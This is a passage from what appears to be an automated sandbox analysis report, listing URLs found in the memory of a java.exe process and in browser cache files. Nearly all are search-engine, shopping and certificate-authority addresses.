Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmp	String found in binary or memory: http://search.atlas.cz/
Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmp	String found in binary or memory: http://search.auction.co.kr/
Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmp	String found in binary or memory: http://search.auone.jp/
Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmp	String found in binary or memory: http://search.books.com.tw/
Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmp	String found in binary or memory: http://search.books.com.tw/favicon.ico
Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmp	String found in binary or memory: http://search.centrum.cz/
Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmp	String found in binary or memory: http://search.centrum.cz/favicon.ico
Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmp	String found in binary or memory: http://search.chol.com/
Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmp	String found in binary or memory: http://search.chol.com/favicon.ico
Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmp	String found in binary or memory: http://search.cn.yahoo.com/
Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmp	String found in binary or memory: http://search.daum.net/
Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmp	String found in binary or memory: http://search.daum.net/favicon.ico
Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmp	String found in binary or memory: http://search.dreamwiz.com/
Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmp	String found in binary or memory: http://search.dreamwiz.com/favicon.ico
Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmp	String found in binary or memory: http://search.ebay.co.uk/
Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmp	String found in binary or memory: http://search.ebay.com/
Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmp	String found in binary or memory: http://search.ebay.com/favicon.ico
Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmp	String found in binary or memory: http://search.ebay.de/
Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmp	String found in binary or memory: http://search.ebay.es/
Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmp	String found in binary or memory: http://search.ebay.fr/
Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmp	String found in binary or memory: http://search.ebay.in/
Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmp	String found in binary or memory: http://search.ebay.it/
Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmp	String found in binary or memory: http://search.empas.com/
Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmp	String found in binary or memory: http://search.empas.com/favicon.ico
Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmp	String found in binary or memory: http://search.espn.go.com/
Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmp	String found in binary or memory: http://search.gamer.com.tw/
Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmp	String found in binary or memory: http://search.gamer.com.tw/favicon.ico
Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmp	String found in binary or memory: http://search.gismeteo.ru/
Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmp	String found in binary or memory: http://search.goo.ne.jp/
Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmp	String found in binary or memory: http://search.goo.ne.jp/favicon.ico
Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmp	String found in binary or memory: http://search.hanafos.com/
Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmp	String found in binary or memory: http://search.hanafos.com/favicon.ico
Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmp	String found in binary or memory: http://search.interpark.com/
Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmp	String found in binary or memory: http://search.ipop.co.kr/
Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmp	String found in binary or memory: http://search.ipop.co.kr/favicon.ico
Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmp	String found in binary or memory: http://search.live.com/results.aspx?FORM=IEFM1&q=
Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmp	String found in binary or memory: http://search.live.com/results.aspx?FORM=SO2TDF&q=
Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmp	String found in binary or memory: http://search.live.com/results.aspx?FORM=SOLTDF&q=
Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmp	String found in binary or memory: http://search.live.com/results.aspx?q=
Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmp	String found in binary or memory: http://search.livedoor.com/
Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmp	String found in binary or memory: http://search.livedoor.com/favicon.ico
Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmp	String found in binary or memory: http://search.lycos.co.uk/
Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmp	String found in binary or memory: http://search.lycos.com/
Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmp	String found in binary or memory: http://search.lycos.com/favicon.ico
Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmp	String found in binary or memory: http://search.msn.co.jp/results.aspx?q=
Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmp	String found in binary or memory: http://search.msn.co.uk/results.aspx?q=
Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmp	String found in binary or memory: http://search.msn.com.cn/results.aspx?q=
Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmp	String found in binary or memory: http://search.msn.com/results.aspx?q=
Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmp	String found in binary or memory: http://search.nate.com/
Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmp	String found in binary or memory: http://search.naver.com/
Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmp	String found in binary or memory: http://search.naver.com/favicon.ico
Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmp	String found in binary or memory: http://search.nifty.com/
Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmp	String found in binary or memory: http://search.orange.co.uk/
Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmp	String found in binary or memory: http://search.orange.co.uk/favicon.ico
Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmp	String found in binary or memory: http://search.rediff.com/
Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmp	String found in binary or memory: http://search.rediff.com/favicon.ico
Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmp	String found in binary or memory: http://search.seznam.cz/
Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmp	String found in binary or memory: http://search.seznam.cz/favicon.ico
Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmp	String found in binary or memory: http://search.sify.com/
Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmp	String found in binary or memory: http://search.yahoo.co.jp
Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmp	String found in binary or memory: http://search.yahoo.co.jp/favicon.ico
Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmp	String found in binary or memory: http://search.yahoo.com/
Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmp	String found in binary or memory: http://search.yahoo.com/favicon.ico
Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmp	String found in binary or memory: http://search.yahooapis.jp/AssistSearchService/V2/webassistSearch?output=iejson&p=
Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmp	String found in binary or memory: http://search.yam.com/
Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmp	String found in binary or memory: http://search1.taobao.com/
Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmp	String found in binary or memory: http://search2.estadao.com.br/
Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmp	String found in binary or memory: http://searchresults.news.com.au/
Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmp	String found in binary or memory: http://service2.bfast.com/
Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmp	String found in binary or memory: http://sitesearch.timesonline.co.uk/
Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmp	String found in binary or memory: http://so-net.search.goo.ne.jp/
Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmp	String found in binary or memory: http://suche.aol.de/
Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmp	String found in binary or memory: http://suche.freenet.de/
Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmp	String found in binary or memory: http://suche.freenet.de/favicon.ico
Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmp	String found in binary or memory: http://suche.lycos.de/
Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmp	String found in binary or memory: http://suche.t-online.de/
Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmp	String found in binary or memory: http://suche.web.de/
Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmp	String found in binary or memory: http://suche.web.de/favicon.ico
Source: java.exe, 00000002.00000002.257518296.0000000016740000.00000002.00000001.sdmp	String found in binary or memory: http://treyresearch.net
Source: java.exe, 00000002.00000002.252326380.000000000A445000.00000004.00000001.sdmp	String found in binary or memory: http://trustcenter-crl.certificat2.com/Keynectis/KEYNECTIS_ROOT_CA.crl
Source: java.exe, 00000002.00000002.252326380.000000000A445000.00000004.00000001.sdmp	String found in binary or memory: http://trustcenter-crl.certificat2.com/Keynectis/KEYNECTIS_ROOT_CA.crl0
Source: 1.cache[1].js.8.dr	String found in binary or memory: http://truste.com/go.htm?dcme
Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmp	String found in binary or memory: http://tw.search.yahoo.com/
Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmp	String found in binary or memory: http://udn.com/
Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmp	String found in binary or memory: http://udn.com/favicon.ico
Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmp	String found in binary or memory: http://uk.ask.com/
Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmp	String found in binary or memory: http://uk.ask.com/favicon.ico
Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmp	String found in binary or memory: http://uk.search.yahoo.com/
Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmp	String found in binary or memory: http://vachercher.lycos.fr/
Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmp	String found in binary or memory: http://video.globo.com/
Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmp	String found in binary or memory: http://video.globo.com/favicon.ico
Source: get[1].js.8.dr	String found in binary or memory: http://watchdog.truste.com/pvr.php?page=complaint
Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmp	String found in binary or memory: http://web.ask.com/
Source: java.exe, 00000002.00000002.257518296.0000000016740000.00000002.00000001.sdmp	String found in binary or memory: http://www.%s.com
Source: get[1].js.8.dr	String found in binary or memory: http://www.aboutads.info/consumers
Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmp	String found in binary or memory: http://www.abril.com.br/
Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmp	String found in binary or memory: http://www.abril.com.br/favicon.ico
Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmp	String found in binary or memory: http://www.afisha.ru/App_Themes/Default/images/favicon.ico
Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmp	String found in binary or memory: http://www.alarabiya.net/
Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmp	String found in binary or memory: http://www.alarabiya.net/favicon.ico
Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmp	String found in binary or memory: http://www.amazon.co.jp/
Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmp	String found in binary or memory: http://www.amazon.co.uk/
Source: msapplication.xml.7.dr	String found in binary or memory: http://www.amazon.com/
Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmp	String found in binary or memory: http://www.amazon.com/exec/obidos/external-search/104-2981279-3455918?index=blended&keyword=
Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmp	String found in binary or memory: http://www.amazon.com/favicon.ico
Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmp	String found in binary or memory: http://www.amazon.com/gp/search?ie=UTF8&tag=ie8search-20&index=blended&linkCode=qs&c
Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmp	String found in binary or memory: http://www.amazon.de/
Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmp	String found in binary or memory: http://www.aol.com/favicon.ico
Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmp	String found in binary or memory: http://www.arrakis.com/
Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmp	String found in binary or memory: http://www.arrakis.com/favicon.ico
Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmp	String found in binary or memory: http://www.asharqalawsat.com/
Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmp	String found in binary or memory: http://www.asharqalawsat.com/favicon.ico
Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmp	String found in binary or memory: http://www.ask.com/
Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmp	String found in binary or memory: http://www.auction.co.kr/auction.ico
Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmp	String found in binary or memory: http://www.baidu.com/
Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmp	String found in binary or memory: http://www.baidu.com/favicon.ico
Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmp	String found in binary or memory: http://www.cdiscount.com/
Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmp	String found in binary or memory: http://www.cdiscount.com/favicon.ico
Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmp	String found in binary or memory: http://www.ceneo.pl/
Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmp	String found in binary or memory: http://www.ceneo.pl/favicon.ico
Source: java.exe, 00000002.00000002.252326380.000000000A445000.00000004.00000001.sdmp	String found in binary or memory: http://www.certplus.com/CRL/class2.crl
Source: java.exe, 00000002.00000002.252326380.000000000A445000.00000004.00000001.sdmp	String found in binary or memory: http://www.certplus.com/CRL/class2.crl0
Source: java.exe, 00000002.00000002.252326380.000000000A445000.00000004.00000001.sdmp	String found in binary or memory: http://www.certplus.com/CRL/class3P.crl
Source: java.exe, 00000002.00000002.252326380.000000000A445000.00000004.00000001.sdmp	String found in binary or memory: http://www.certplus.com/CRL/class3P.crl0
Source: java.exe, 00000002.00000002.253018092.000000000A5C8000.00000004.00000001.sdmp	String found in binary or memory: http://www.chambersign.org
Source: java.exe, 00000002.00000002.252326380.000000000A445000.00000004.00000001.sdmp	String found in binary or memory: http://www.chambersign.org1
Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmp	String found in binary or memory: http://www.chennaionline.com/ncommon/images/collogo.ico
Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmp	String found in binary or memory: http://www.cjmall.com/
Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmp	String found in binary or memory: http://www.cjmall.com/favicon.ico
Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmp	String found in binary or memory: http://www.clarin.com/favicon.ico
Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmp	String found in binary or memory: http://www.cnet.co.uk/
Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmp	String found in binary or memory: http://www.cnet.com/favicon.ico
Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmp	String found in binary or memory: http://www.dailymail.co.uk/
Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmp	String found in binary or memory: http://www.dailymail.co.uk/favicon.ico
Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmp	String found in binary or memory: http://www.docUrl.com/bar.htm
Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmp	String found in binary or memory: http://www.etmall.com.tw/
Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmp	String found in binary or memory: http://www.etmall.com.tw/favicon.ico
Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmp	String found in binary or memory: http://www.excite.co.jp/
Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmp	String found in binary or memory: http://www.expedia.com/
Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmp	String found in binary or memory: http://www.expedia.com/favicon.ico
Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmp	String found in binary or memory: http://www.gismeteo.ru/favicon.ico
Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmp	String found in binary or memory: http://www.gmarket.co.kr/
Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmp	String found in binary or memory: http://www.gmarket.co.kr/favicon.ico
Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.co.in/
Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.co.jp/
Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.co.uk/
Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.com.br/
Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.com.sa/
Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.com.tw/
Source: msapplication.xml1.7.dr	String found in binary or memory: http://www.google.com/
Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.com/favicon.ico
Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.cz/
Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.de/
Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.es/
Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.fr/
Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.it/
Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.pl/
Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.ru/
Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.si/
Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmp	String found in binary or memory: http://www.iask.com/
Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmp	String found in binary or memory: http://www.iask.com/favicon.ico
Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmp	String found in binary or memory: http://www.kkbox.com.tw/
Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmp	String found in binary or memory: http://www.kkbox.com.tw/favicon.ico
Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmp	String found in binary or memory: http://www.linternaute.com/favicon.ico
Source: msapplication.xml2.7.dr	String found in binary or memory: http://www.live.com/
Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmp	String found in binary or memory: http://www.maktoob.com/favicon.ico
Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmp	String found in binary or memory: http://www.mercadolibre.com.mx/
Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmp	String found in binary or memory: http://www.mercadolibre.com.mx/favicon.ico
Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmp	String found in binary or memory: http://www.mercadolivre.com.br/
Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmp	String found in binary or memory: http://www.mercadolivre.com.br/favicon.ico
Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmp	String found in binary or memory: http://www.merlin.com.pl/
Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmp	String found in binary or memory: http://www.merlin.com.pl/favicon.ico
Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmp	String found in binary or memory: http://www.microsofttranslator.com/?ref=IE8Activity
Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmp	String found in binary or memory: http://www.microsofttranslator.com/BV.aspx?ref=IE8Activity&a=
Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmp	String found in binary or memory: http://www.microsofttranslator.com/BVPrev.aspx?ref=IE8Activity
Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmp	String found in binary or memory: http://www.microsofttranslator.com/Default.aspx?ref=IE8Activity
Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmp	String found in binary or memory: http://www.microsofttranslator.com/DefaultPrev.aspx?ref=IE8Activity
Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmp	String found in binary or memory: http://www.mtv.com/
Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmp	String found in binary or memory: http://www.mtv.com/favicon.ico
Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmp	String found in binary or memory: http://www.myspace.com/favicon.ico
Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmp	String found in binary or memory: http://www.najdi.si/
Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmp	String found in binary or memory: http://www.najdi.si/favicon.ico
Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmp	String found in binary or memory: http://www.nate.com/favicon.ico
Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmp	String found in binary or memory: http://www.neckermann.de/
Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmp	String found in binary or memory: http://www.neckermann.de/favicon.ico
Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmp	String found in binary or memory: http://www.news.com.au/favicon.ico
Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmp	String found in binary or memory: http://www.nifty.com/favicon.ico
Source: msapplication.xml3.7.dr	String found in binary or memory: http://www.nytimes.com/
Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmp	String found in binary or memory: http://www.ocn.ne.jp/favicon.ico
Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmp	String found in binary or memory: http://www.orange.fr/
Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmp	String found in binary or memory: http://www.otto.de/favicon.ico
Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmp	String found in binary or memory: http://www.ozon.ru/
Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmp	String found in binary or memory: http://www.ozon.ru/favicon.ico
Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmp	String found in binary or memory: http://www.ozu.es/favicon.ico
Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmp	String found in binary or memory: http://www.paginasamarillas.es/
Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmp	String found in binary or memory: http://www.paginasamarillas.es/favicon.ico
Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmp	String found in binary or memory: http://www.pchome.com.tw/favicon.ico
Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmp	String found in binary or memory: http://www.priceminister.com/
Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmp	String found in binary or memory: http://www.priceminister.com/favicon.ico
Source: java.exe, 00000002.00000002.252326380.000000000A445000.00000004.00000001.sdmp	String found in binary or memory: http://www.quovadis.bm
Source: java.exe, 00000002.00000002.252326380.000000000A445000.00000004.00000001.sdmp	String found in binary or memory: http://www.quovadis.bm0
Source: java.exe, 00000002.00000002.252326380.000000000A445000.00000004.00000001.sdmp	String found in binary or memory: http://www.quovadisglobal.com/cps
Source: java.exe, 00000002.00000002.252326380.000000000A445000.00000004.00000001.sdmp	String found in binary or memory: http://www.quovadisglobal.com/cps0
Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmp	String found in binary or memory: http://www.rakuten.co.jp/favicon.ico
Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmp	String found in binary or memory: http://www.rambler.ru/
Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmp	String found in binary or memory: http://www.rambler.ru/favicon.ico
Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmp	String found in binary or memory: http://www.recherche.aol.fr/
Source: msapplication.xml4.7.dr	String found in binary or memory: http://www.reddit.com/
Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmp	String found in binary or memory: http://www.rtl.de/
Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmp	String found in binary or memory: http://www.rtl.de/favicon.ico
Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmp	String found in binary or memory: http://www.servicios.clarin.com/
Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmp	String found in binary or memory: http://www.shopzilla.com/
Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmp	String found in binary or memory: http://www.sify.com/favicon.ico
Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmp	String found in binary or memory: http://www.so-net.ne.jp/share/favicon.ico
Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmp	String found in binary or memory: http://www.sogou.com/
Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmp	String found in binary or memory: http://www.sogou.com/favicon.ico
Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmp	String found in binary or memory: http://www.soso.com/
Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmp	String found in binary or memory: http://www.soso.com/favicon.ico
Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmp	String found in binary or memory: http://www.t-online.de/favicon.ico
Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmp	String found in binary or memory: http://www.taobao.com/
Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmp	String found in binary or memory: http://www.taobao.com/favicon.ico
Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmp	String found in binary or memory: http://www.target.com/
Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmp	String found in binary or memory: http://www.target.com/favicon.ico
Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmp	String found in binary or memory: http://www.tchibo.de/
Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmp	String found in binary or memory: http://www.tchibo.de/favicon.ico
Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmp	String found in binary or memory: http://www.tesco.com/
Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmp	String found in binary or memory: http://www.tesco.com/favicon.ico
Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmp	String found in binary or memory: http://www.timesonline.co.uk/img/favicon.ico
Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmp	String found in binary or memory: http://www.tiscali.it/favicon.ico
Source: msapplication.xml5.7.dr	String found in binary or memory: http://www.twitter.com/
